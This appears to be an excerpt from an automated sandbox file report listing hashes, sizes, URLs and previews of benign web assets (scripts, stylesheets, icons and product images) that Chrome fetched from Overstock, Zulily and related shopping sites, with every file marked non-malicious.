                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):99877
                                                                                                                                                                                    Entropy (8bit):5.287661348034516
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:OmzvhHYwwuMGrdToj42tMmqpnp+ny80HtcuXX:BYDMmqpwxuH
                                                                                                                                                                                    MD5:0257750A4598BB1C7F20C16C396F97F3
                                                                                                                                                                                    SHA1:743283FA63C57DB4112C503CBDE110E0D5B88B02
                                                                                                                                                                                    SHA-256:D67000E5EAEA2B8B7419DDF5C2F67E93A5C5962BC1CBCF1CA212AC6BD56D64D8
                                                                                                                                                                                    SHA-512:23F2E70EEBF9761527A75A89C31AAB6EC3E4814478C7FA297376FA4446F59FC416F7FA45F1B326899615A39A3C9F5E5AB1EC4519C8997F44AB504D2E54FDBF51
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[179],{932:function(e,t){"use strict";function r(e,t,r,n,a,o,i){try{var u=e[o](i),c=u.value}catch(s){return void r(s)}u.done?t(c):Promise.resolve(c).then(n,a)}t.Z=function(e){return function(){var t=this,n=arguments;return new Promise((function(a,o){var i=e.apply(t,n);function u(e){r(i,a,o,u,c,"next",e)}function c(e){r(i,a,o,u,c,"throw",e)}u(void 0)}))}}},6495:function(e,t){"use strict";function r(){return r=Object.assign||function(e){for(var t=1;t<arguments.length;t++){var r=arguments[t];for(var n in r)Object.prototype.hasOwnProperty.call(r,n)&&(e[n]=r[n])}return e},r.apply(this,arguments)}t.Z=function(){return r.apply(this,arguments)}},2648:function(e,t){"use strict";t.Z=function(e){return e&&e.__esModule?e:{default:e}}},1598:function(e,t){"use strict";function r(e){if("function"!==typeof WeakMap)return null;var t=new WeakMap,n=new WeakMap;return(r=function(e){return e?n:t})(e)}t.Z=function(e,t){if(!t&&e&&e.__esModule)return e;i
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (61318)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):63333
                                                                                                                                                                                    Entropy (8bit):5.515207596951102
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:qYWvuPAadRXadFil26aAn7t2npMvCm+uGYD8BQrEWvyElVlqZw4aN8uDvz6TCLIb:qYW2Pj5yO7t2ACRg8398Zc/bl+w
                                                                                                                                                                                    MD5:2F6B929A7476878FDC10E8715BE10CDC
                                                                                                                                                                                    SHA1:FFC5324E7E3E69853AA74CB73F773D7F0C2E16D9
                                                                                                                                                                                    SHA-256:48357B13246D50190462FFC2045C8B71790EABDA678C062D94EC352D9061B271
                                                                                                                                                                                    SHA-512:2C651DA8429BE7A3D28C53261EB2E989CBF6BC95EC861A188498031CD305EDCE0D4FD111E8B4ADA48FB1F1865F4050988E1B9052C5F4C64A2E9207C9648E75DA
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.zulily.com/wpm@d9f539ffw0e1474c4pae8b6d69m179c86ad/custom/web-pixel-126419260@1/sandbox/modern/
                                                                                                                                                                                    Preview:<!DOCTYPE html>.<html>. <head>. <meta charset="utf-8">. <title>Web Pixels Manager Sandbox</title>. <script type="text/javascript">. (()=>{var e={3482:function(e,t,r){var n,i,o;!function(a,s){"use strict";i=[r(3550)],void 0===(o="function"==typeof(n=function(e){var t=/(^|@)\S+:\d+/,r=/^\s*at .*(\S+:\d+|\(native\))/m,n=/^(eval@)?(\[native code])?$/;return{parse:function(e){if(void 0!==e.stacktrace||void 0!==e["opera#sourceloc"])return this.parseOpera(e);if(e.stack&&e.stack.match(r))return this.parseV8OrIE(e);if(e.stack)return this.parseFFOrSafari(e);throw new Error("Cannot parse given Error object")},extractLocation:function(e){if(-1===e.indexOf(":"))return[e];var t=/(.+?)(?::(\d+))?(?::(\d+))?$/.exec(e.replace(/[()]/g,""));return[t[1],t[2]||void 0,t[3]||void 0]},parseV8OrIE:function(t){return t.stack.split("\n").filter((function(e){return!!e.match(r)}),this).map((function(t){t.indexOf("(eval ")>-1&&(t=t.replace(/eval code/g,"eval").replace(/(\(eval at [^()]*)|(,.*$)/g,""));va
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1904
                                                                                                                                                                                    Entropy (8bit):7.0640622851765675
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:oTCIl/X2YlXWI2PUZH/25QsOBipxufQ+uvrp5eeuYYJATwArmdOpY4F9O0YtBXvw:9Il/Xflj/9svKs5etATPqdYW0GB/+r
                                                                                                                                                                                    MD5:6D4B447540D2BDD31A2ED375B42B5114
                                                                                                                                                                                    SHA1:BBE31A1217A4945C06ECE6B96933F1F9CCDFA19F
                                                                                                                                                                                    SHA-256:FF44A3D4887C40F8B935D3E38C7D66A6F98235D85991A82827AC3604AAC2389D
                                                                                                                                                                                    SHA-512:1D1BBB9F10B24310FBB214B8FCAB6E9296E483B2D29882DF2BA2C4A7E6C71FD6CE935ED03226B09C95D5585394409544C04361C95A9BB9E7CD0532C65568B8D6
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/Mia-Oversized-Modular-Sectional-Fabric-Sofa-Set_4bffcc72-c6ce-47fa-86db-82a074632464.jpg?v=1729325186&width=80
                                                                                                                                                                                    Preview:RIFFh...WEBPVP8X....(...O..O..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 ....P....*P.P.>-..B........bY.1B.d...Z..........+.....`A...).....M.BY?[/.e&.._...m.2q.N...m.$"..@...S....FH.{....5..n.KC.z...zA.O..w:V.t...>........oP}...MI.......H?"C.....t..B..4.2.....@....&...L......-...A.^E.}..{...k*......v....8..S.1...7s.Ww.D..]o.s.....:P.3..z.A...;.o...K...U....l..."u..b..../..@..t..W..x.E.0{6<...d..d........#.C.RNS4.N...i....*6Q`U.A.&......'Z(.vS.G.A*G...O.!.}....[....hQ...!.S...1.......~bj|H2...].,...FS.u+.<..|.~a|..S....2c-nu..K6s.D..q.....H...M,.....c....7........i../...c
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):586
                                                                                                                                                                                    Entropy (8bit):4.671484325644577
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12:t4Cv0M65dXgU8aYUOEdSkFGpmucWc18uMhHbvomjkpyX/jwN:t4Cv0MMkaNkmucv1TMJbtm2g
                                                                                                                                                                                    MD5:38A727A685535993A4821935FE1B99FD
                                                                                                                                                                                    SHA1:54DD7A41371BE5699AE8B8BFB0A391C4E7AF6251
                                                                                                                                                                                    SHA-256:0EE912C41CA99DA7831CD3A16A136CB52EBBCC53A0230CF7F31EF8BC69445894
                                                                                                                                                                                    SHA-512:F4264E3FBA14B607358BD43B72D36E16D6918AF0822486960328BD29DF9DD6A11B94BBE47C74D74839312A7AFEB998F86E782632D6139ECCEC28C295D7A3320D
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ak1.ostkcdn.com/img/mxc/20200227_rating-star-empty.svg
                                                                                                                                                                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 8 8">. <path fill-rule="evenodd" clip-rule="evenodd" d="M3.67444 0.212345L2.63552 2.41511L0.312205 2.7684C0.0139737 2.81375 -0.105114 3.19732 0.110683 3.41748L1.79181 5.13257L1.39507 7.55424C1.34414 7.86508 1.65586 8.10212 1.92259 7.9554L4.00049 6.81247L6.07838 7.9554C6.34512 8.10212 6.65683 7.86508 6.60591 7.55424L6.20916 5.13257L7.89029 3.41748C8.10609 3.19732 7.987 2.81375 7.68877 2.7684L5.36545 2.41511L4.32653 0.212345C4.19315 -0.0704562 3.80782 -0.0704562 3.67444 0.212345Z" fill="#bfbfbf"/>.</svg>
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (4919)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):5021
                                                                                                                                                                                    Entropy (8bit):5.135277879284868
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:JUp69LycE3lSpc5Vzf61MSMvKqlMwvKdMCyzwyzk5iHJT+yuAcwFvzLWM1Q1jPLF:koW13lgWJZiYiUU2k5iHJT+yuAcwpzL6
                                                                                                                                                                                    MD5:69D47DD389AA39210C39D9E54746D381
                                                                                                                                                                                    SHA1:18D3DA08411CD0F0D35DC9F0F5BF1DBC38C19679
                                                                                                                                                                                    SHA-256:284E4709917A8F13A4F231FE19282FD759313412A516545A8C708D3AD79A4D9A
                                                                                                                                                                                    SHA-512:2BA3753B0DD1C728C4BA4F91A79FBC905FE24E036A0CE86457C32C25029C95070278AEC6DE50FFE86DE7B30E1B867571AA5FBAF6BD941CCC33E66769C138FFF6
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/t/224/assets/overstock-vsearch.js?v=91303111315175917061730157903
                                                                                                                                                                                    Preview:const remapData=data=>{const{facets,products,resultCount,page,attributionToken,sortOptions,selectedSort,searchQuery}=data,sortBy=sortOptions.find(sort=>sort.value==selectedSort),query=searchQuery?.productSearchQuery?.searchParameters?.keywords,filters=facets.reduce((acc,group)=>(group.values.forEach(value=>{if(value.selected){const existingGroupIndex=acc.findIndex(item=>item.startsWith(`${group.displayName}:`));if(existingGroupIndex!==-1){const[key,existingValues]=acc[existingGroupIndex].split(": "),updatedValues=`${existingValues}; ${value.displayName}`;acc[existingGroupIndex]=`${key}: ${updatedValues}`}else acc.push(`${group.displayName}: ${value.displayName}`)}}),acc),[]);return{products,resultCount,page,attributionToken,sortBy,query,filters}};if(document.addEventListener("on:product-listing:change",event=>{const{products,page,attributionToken,sortBy,query,filters}=remapData({...event.detail}),items=products.map(p=>({id:p.id,product_name:p.title,sku:p.sku,variant_id:p.variant_id,var
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 320x320, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):37428
                                                                                                                                                                                    Entropy (8bit):7.965857471670544
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:y7w31cT9Mk0PjOnfSI/FniYO+98AjxBQYg68IpfH:yseT22Bmc8OeYg6NfH
                                                                                                                                                                                    MD5:41460C24C40FA095F3CA6953138D7AD4
                                                                                                                                                                                    SHA1:92BB18E14E68AC6A3528D49785DBD39C244E54A2
                                                                                                                                                                                    SHA-256:12DE265EBA390B41455FDACF953ACB7C9D0B7773DC6CDDF62DA949303793107A
                                                                                                                                                                                    SHA-512:1E9CC046F905C89AFB81B44E1E1B029C8FE6FD329ABACDA6491B6723E71EA84ABFAECD13D1B7AAA57806092FCAE3FEEFBAC8A502F3DB5CFEA00F4A657BC7841E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................@...........@...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......@.@...................................................................................<.m...sZ..ia.s.D..gT.6.+....5..Y.....un...j$..I.(u.).t.z.A.f....Q....3L..G...l....*.},.e.5.\....~.i..k..z..*./?ES].....b.\/..
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):24
                                                                                                                                                                                    Entropy (8bit):2.459147917027245
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:CUXJ/lH:Dl
                                                                                                                                                                                    MD5:BC32ED98D624ACB4008F986349A20D26
                                                                                                                                                                                    SHA1:2D3DF8C11D2168CE2C27E0937421D11D85016361
                                                                                                                                                                                    SHA-256:0C9CF152A0AD00D4F102C93C613C104914BE5517AC8F8E0831727F8BFBE8B300
                                                                                                                                                                                    SHA-512:71ACC6DA78D5D5BF0EEA30E2EE0AC5C992B00EFEC959077DFE0AB769F1DBBD9AF12D5C5C155046283D5416BEB606A9EF323FB410E903768B1569B69F37075B4E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:GIF89a.......,..........
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 80x80, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):2479
                                                                                                                                                                                    Entropy (8bit):7.122153831998638
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:NBIl/XflVxPh+Pbe+GWUWHQzApN+HNJKZYYbwYysHTrA+uZj+XrrN00Rexz:NBIl/XrxSarKiJpYb5ysz7U4O4Ez
                                                                                                                                                                                    MD5:11572B04AF9F58169AB5C20784E2D32F
                                                                                                                                                                                    SHA1:62A9F85697B6B477FC2641BF2B1BF932F9BB7C9D
                                                                                                                                                                                    SHA-256:1962E432B3AFCBB747CBC3628A231D9667FCC662BE0B0CF0D77F7D29FC7F63B9
                                                                                                                                                                                    SHA-512:561A6A524630F26BA653CB0ACCAF30AC2A3A1054E765A6CF0BCE6A712CAA96655D8344C21D01EF4D484405C7858101FC493686393E7091CBB75E665BBA71C215
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................P...........P...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......P.P................................................................................`.A...........J$v.ch.R....5..U-\...+Y...'O.d..Bo.i..cpf.C$....cU......Yj.3+ .......B.........ud2.NI..o.9.rJ{.&....].....8..N..N..../.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (5381)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):5476
                                                                                                                                                                                    Entropy (8bit):5.143177580164717
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:tE7zMPnRgA+eSoqUSGZTJDg8BO4uUO04d2HpeEJWI4qY:4MbwoqUSaJDtBODUs2J64Y
                                                                                                                                                                                    MD5:10E20BE3E8E25F966CB7D9076B6A4C3D
                                                                                                                                                                                    SHA1:560EC262B6537223173CC050549E984FC1B26868
                                                                                                                                                                                    SHA-256:6D9EDFAD516AA4B68F10B9A7C620EAA3D9AA0CEC3D95A4E7D026C2DE3DFA1BEF
                                                                                                                                                                                    SHA-512:6F0CE784D8D8D6845AC5C331CEB2F80EEB89A53CB2D474AE98B415B6379CAB6B099F8F3264B45775D4CF5CCF3AFEA7A807237B39D8EDEF51E28CCC5F308E0B72
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:/*! instant.page v5.2.0 - (C) 2019-2023 Alexandre Dieulot - https://instant.page/license */let _chromiumMajorVersionInUserAgent=null,_allowQueryString,_allowExternalLinks,_useWhitelist,_delayOnHover=65,_lastTouchTimestamp,_mouseoverTimer,_preloadedList=new Set;const DELAY_TO_NOT_BE_CONSIDERED_A_TOUCH_INITIATED_ACTION=1111;init();function init(){if(!document.createElement("link").relList.supports("prefetch"))return;const handleVaryAcceptHeader="instantVaryAccept"in document.body.dataset||"Shopify"in window,chromiumUserAgentIndex=navigator.userAgent.indexOf("Chrome/");if(chromiumUserAgentIndex>-1&&(_chromiumMajorVersionInUserAgent=parseInt(navigator.userAgent.substring(chromiumUserAgentIndex+7))),handleVaryAcceptHeader&&_chromiumMajorVersionInUserAgent&&_chromiumMajorVersionInUserAgent<110)return;const mousedownShortcut="instantMousedownShortcut"in document.body.dataset;_allowQueryString="instantAllowQueryString"in document.body.dataset,_allowExternalLinks="instantAllowExternalLinks"in d
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1626
                                                                                                                                                                                    Entropy (8bit):6.8420329288879795
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:ZTCIl/X2YlXWI2PULmTmN2hNS23wxMGuZUSQsJX0phX3P7CO4iet5AP:oIl/XflsmMInu2SQsx0phHP7kiKeP
                                                                                                                                                                                    MD5:078C67878DB32D8529495396BA3E2D5E
                                                                                                                                                                                    SHA1:FA072073579BF0AF32447A03A372F9C70BD24841
                                                                                                                                                                                    SHA-256:BA505A87DD1811EE874AC148468B2855DDB2A1FB530ECD8A33385F8A57D76110
                                                                                                                                                                                    SHA-512:0BA81059DA030198E4B2F190F2CC4137201BE38B70DF7259AD580D033D52830FB470A31C2F50E69658024448B108AD7B0D124B8D5252001B1E79E06D27DEA690
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/Mia-Oversized-Modular-Sectional-Fabric-Sofa-Set_e188d961-b558-4606-89bc-8073411ca2d4.jpg?v=1729325183&width=80
                                                                                                                                                                                    Preview:RIFFR...WEBPVP8X....(...O..O..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 .........*P.P.>1..B.!!.:.. ....e.9X.P.xi....o....h..[p..{.....i.j?...sg.k.3......^U....9@.S.@..i.i.QN:.V5.....(..>.{^.'W.....`.E....GL.E.]...2......k......F..mV..(..W.+....Q..5@.....2.P.A#..#.^ ....\C-LY........M..u.w.a.0...{"......o..~#..S.Q.yH6...%._....o...U.y.?..8.R....G..;...`..4-..K...a...)I..&..+`G-.PU....Z.n.;..yo...e.M....r.....+.,:.t....i....}.....f..%Y.o.s..N.X..[..T&..v....9u..>...O.".v..~.h....)....P6}6._..xLe4..V..#=.G"j..k....(.X..l7?.....Y.#.Y......S.}w..Mr._...f...Olx.....{....F.C....5..r!B...}...
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (20235)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):24394
                                                                                                                                                                                    Entropy (8bit):5.512377842344329
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:vs/9vNwg8FS7dGJBTCsGg2mB/5FUs6pKLbUxdXtLXaJPPv2GggWGY:uN9DmZlYdS2GggWGY
                                                                                                                                                                                    MD5:17F0A135EB15799FCFFAD2B076BA5A83
                                                                                                                                                                                    SHA1:FA09FE59E00C70EB47B518445F49EA7BE052F49E
                                                                                                                                                                                    SHA-256:2C2376365F9C79B9338182A4973F121D6C13168A497818EE8C0B05948E22BBCF
                                                                                                                                                                                    SHA-512:13FE748AD572F6A0AA42277FE32F15C2D28EAF9D7DBF64ACAC48EA9896C274039D0F52E4A9102035CF09D5BCAE64C364F12D1F65DC171B4DAC30827A306D053B
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:const __vite__fileDeps=window.__vite__fileDeps||[],__vite__mapDeps=i=>i.map(i=>__vite__fileDeps[i]);.(function(){"use strict";try{if(typeof document<"u"){var e=document.createElement("style");e.appendChild(document.createTextNode(`._overlay_1il33_1{position:fixed;top:0;left:0;width:100%;height:100%;z-index:35;display:block;opacity:1;background-color:#fff}._withSideAnimation_1il33_13{transition:left .3s ease}._open_1il33_17{left:0}._close_1il33_21{left:100%}._facetValueLabel_1n921_1{position:relative;display:block;padding-left:28px;color:#252525;font-size:14px;cursor:pointer}._facetValueLabel_1n921_1 input{position:absolute;opacity:0;height:0;width:0}._facetValueLabel_1n921_1:before{content:"";position:absolute;top:50%;left:0;transform:translateY(-50%);width:20px;height:20px;box-sizing:border-box;border-radius:2px;border:1px solid #5a5a5a}._facetValueLabel_1n921_1._isRadio_1n921_27:before{border-radius:50%}._checked_1n921_31:before{border:none;content:url("data:image/svg+xml,%3csvg%20xm
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (65321)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):96614
                                                                                                                                                                                    Entropy (8bit):4.750153610655337
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:EKM1MvMaMfMRQA709/bQZMfjSFOlyPG9zXgRw0D:Z709/UGGFwyPG9zwRw0D
                                                                                                                                                                                    MD5:4CA760F49CD8A14911C81E6C14328874
                                                                                                                                                                                    SHA1:81687E7A5DBBA470120798CF05DC31E8D57F0B11
                                                                                                                                                                                    SHA-256:F99C17690330C805C47DA3D7592864D6ACF0F73817D432447E1B0C66AD28F221
                                                                                                                                                                                    SHA-512:BC14B089615EC40F6B031631CA36D75FC55267117BBD7D6DFBE21821DA288E56F2FBDCE920B9984D82D80067C153A8EC43CC664D40853298CF248C0F0F4A278C
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ka-f.fontawesome.com/releases/v6.6.0/css/free.min.css?token=541968e6a0
                                                                                                                                                                                    Preview:/*!. * Font Awesome Free 6.6.0 by @fontawesome - https://fontawesome.com. * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). * Copyright 2024 Fonticons, Inc.. */.fa{font-family:var(--fa-style-family,"Font Awesome 6 Free");font-weight:var(--fa-style,900)}.fa,.fa-brands,.fa-classic,.fa-regular,.fa-sharp-solid,.fa-solid,.fab,.far,.fas{-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;display:var(--fa-display,inline-block);font-style:normal;font-variant:normal;line-height:1;text-rendering:auto}.fa-classic,.fa-regular,.fa-solid,.far,.fas{font-family:"Font Awesome 6 Free"}.fa-brands,.fab{font-family:"Font Awesome 6 Brands"}.fa-1x{font-size:1em}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-6x{font-size:6em}.fa-7x{font-size:7em}.fa-8x{font-size:8em}.fa-9x{font-size:9em}.fa-10x{font-size:10em}.fa-2xs{font-size:.625em;line-height:.1em;vertical-align:.225em}.fa-xs{font-size:.75em;
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):133
                                                                                                                                                                                    Entropy (8bit):5.202262395749922
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:6OwArfNdaFnVx6IUARCRu0NArfmHtnN0fmUQVVGbXeMvdn:6TALNdaFnViARCgSAL+NmNuMVn
                                                                                                                                                                                    MD5:D6D92AF15B86A7862B72EF9488670940
                                                                                                                                                                                    SHA1:7DD674288B0F2282C2E8F0FE0D5C370527350032
                                                                                                                                                                                    SHA-256:A66D53C24BD05E9DBCFB5AE420A74FB01EAB8316CBD85C1C210533EFCB223AB1
                                                                                                                                                                                    SHA-512:FB1E39224932FAD38C3E23061211FC9B64F7BE54054EBCE6595A589CC16863E2721A245911455FF8F49145D0B1F40BEE4654CB08764B496F4C5E7E9C3554B91D
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/assets/RageClickCapture.DnkQ4tsk.css
                                                                                                                                                                                    Preview:.RTmkG{width:190px}@media screen and (max-width: 750px){.RTmkG{width:100%}}.U4CmB{width:100%}.E4OHT{opacity:50%}.hLtvr{display:none}.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):24
                                                                                                                                                                                    Entropy (8bit):2.459147917027245
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:CUXJ/lH:Dl
                                                                                                                                                                                    MD5:BC32ED98D624ACB4008F986349A20D26
                                                                                                                                                                                    SHA1:2D3DF8C11D2168CE2C27E0937421D11D85016361
                                                                                                                                                                                    SHA-256:0C9CF152A0AD00D4F102C93C613C104914BE5517AC8F8E0831727F8BFBE8B300
                                                                                                                                                                                    SHA-512:71ACC6DA78D5D5BF0EEA30E2EE0AC5C992B00EFEC959077DFE0AB769F1DBBD9AF12D5C5C155046283D5416BEB606A9EF323FB410E903768B1569B69F37075B4E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:GIF89a.......,..........
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 80x80, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):2439
                                                                                                                                                                                    Entropy (8bit):7.075678882080086
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:NBIl/XflVxnvpnP6/eiJO1D0gQB/bpjvBLBKVPeSgjn:NBIl/Xrxvpny2AO1DtQBJmVPe5n
                                                                                                                                                                                    MD5:A6ED9FE5E082ABC1781EC0810658FF96
                                                                                                                                                                                    SHA1:DB869AD7871400CCF39677EC2091F3FA5C2D3DB2
                                                                                                                                                                                    SHA-256:866946FA0CC7F6569B4AB98165D1203D3CE5CD011CF79CB29B67AA3D2636B1DF
                                                                                                                                                                                    SHA-512:0B08747E67C82E1B25C29A16E1C72B04BB7CD84C5B432B1F1E2D3D4C3AD5F0C5D83AEB6BB298AC6824E21BFBC00787E7F2D927481772C35C262E9FD3155A3379
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................P...........P...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......P.P..................................................................................`.R..2......<..X.i:.... . .....Wr.a.....*p....[=R...:T..0.Y%3...`^.Nb.`.d^K..B.\.LO.0.Hy.....KVuxK....O.gY.9.#)..v.5|...n9..m..@.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (8253)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):8352
                                                                                                                                                                                    Entropy (8bit):5.030342335645065
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:Rx1ixNaLJ7FuZgs9fqOUXcCX0YbYZYxxYwYwFY8VuWxddfAX3mZQb8F2L:Rx1ixELfRICX0YbYZYxxYwYwKCdoHmEL
